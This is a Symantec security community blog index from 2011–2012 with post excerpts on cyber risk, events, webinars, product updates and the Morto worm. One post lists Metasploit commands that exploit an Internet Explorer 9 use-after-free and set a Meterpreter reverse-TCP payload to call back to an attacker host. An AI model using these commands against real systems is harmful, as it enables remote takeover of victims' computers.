Video Screencast Help
Security Community Blog
Showing posts tagged with Symantec Security Information Manager
Showing posts in English
James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Elspeth Magoria | 06 Sep 2012 | 0 comments

Join Symantec and Washington University at the St. Louis Symantec $25k Cyber Security Challenge. This one-of-a-kind event invites security professionals and ethical hackers like yourself to help further improve current security technologies and solutions.

Come learn about the current global threat landscape and IT trends requiring organizations to take new approaches in security – cloud, mobility, compliance, etc.

Stay for the "Challenge", an exciting cyber "Capture the Flag" (CTF) simulation. Take part for a chance to win cash and prizes! And don't miss the Hands-On Security Demo Lab that will showcase current security solutions around mobile, data loss, encryption, email and web security and more.

Be There To Win - All registered attendees get a $50 Amazon.com Gift Card and if you refer two friends and they attend...

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to...
Milan_T | 18 May 2012 | 1 comment

For Security rule requirements may very with respect to time. Like rule implemented once need to be modified or changed or must be reviewed piriodically.

If any new recuirements come to the picture it must be reviwed. I have SSIM in my organisation implemented before few years rules was as it is. Now security purpose and engineering approch needed to update it. so accordingly older rules must be updated, and if necessary it must be added new once for provideing better services.

Deb Banerjee | 17 Feb 2012 | 0 comments

Traditionally information security has been reasoned in terms of assets, vulnerabilities and threats. A mature info-sec program has visibility into its critical assets, a compliance program for reducing its attacks surfaces and vulnerabilities therein, and in detecting and blocking threats.  A rich set of patterns and practices have emerged in supporting these for the physical (and static) data center. These include segmentation as a key practice for isolating higher-trust workloads (eg. PCI) from lower-trust workloads (e.g. test, VDI).  Another important aspect is change control  that surfaces through multi-step provisioning cycles and  change management processes. While these practices are important to ensuring compliance and minimizing attack surfaces, there have impacted IT's ability to respond to changing business requirements.  For example, physically segmented workloads create challenges in resource utilization e.g. ...

GrahamA | 11 Jan 2012 | 1 comment

Happy new year to you all!

The Symantec LUA team released version 2.3.1 in Dec. Just a quick status update for you in relation to how things have been going since then.

We've seen over 200 successful customer installs/upgrades of LUA 2.3.1 so far and feedback has been very positive.

As a recap, 2.3.1 introduced the following enhancements:

  • The LUA web server service will now automatically restart if it crashes or terminates unexpectedly.
  • LUA will now automatically install and utilise an optimised private Java Runtime Environment (version 1.6 update 27). This also means it is no longer necessary to separately install a public JRE for use by LUA.
  • It is now possible for LUA to automatically run multiple specified distribution tasks after a download task completes.
  • New quick link added to the user interface which allows customers to quickly and easily capture all LUA-related troubleshooting...
Pamela Reese | 09 Nov 2011 | 3 comments

Symantec received a finalist nomination in 12 catagories of the upcoming SC Magazine 2012 Awards, representing Symantec's broad portfolio of superior security offerings. SC Magazine will announce the winners at a dinner event during RSA 2012. Symantec looks forward to attending! 

Best Anti-Malware Gateway(Symantec Web Gateway 5.0)

Best Cloud Computing Security(Symantec Endpoint Protection.cloud)

Best Data Leakage Prevention (DLP)(Symantec Data Loss Prevention)

...

Tariq Naik | 06 Oct 2011 | 0 comments

IBM and Intel's security arm, McAfee, have bought themselves SIEM capabilities with IBM buying Q1 Labs, and McAfee is purchasing NitroSecurity. This follows HP's aqquisiton of Arcsight last year.

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-secure issued warnings about a new global threat called “Morto”, and The Internet Storm Center has been seeing a large spike in traffic on Port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and  ..pwnage ensues.

Symantec detects this threat as W32.Morto and Security Response and will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

 

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As...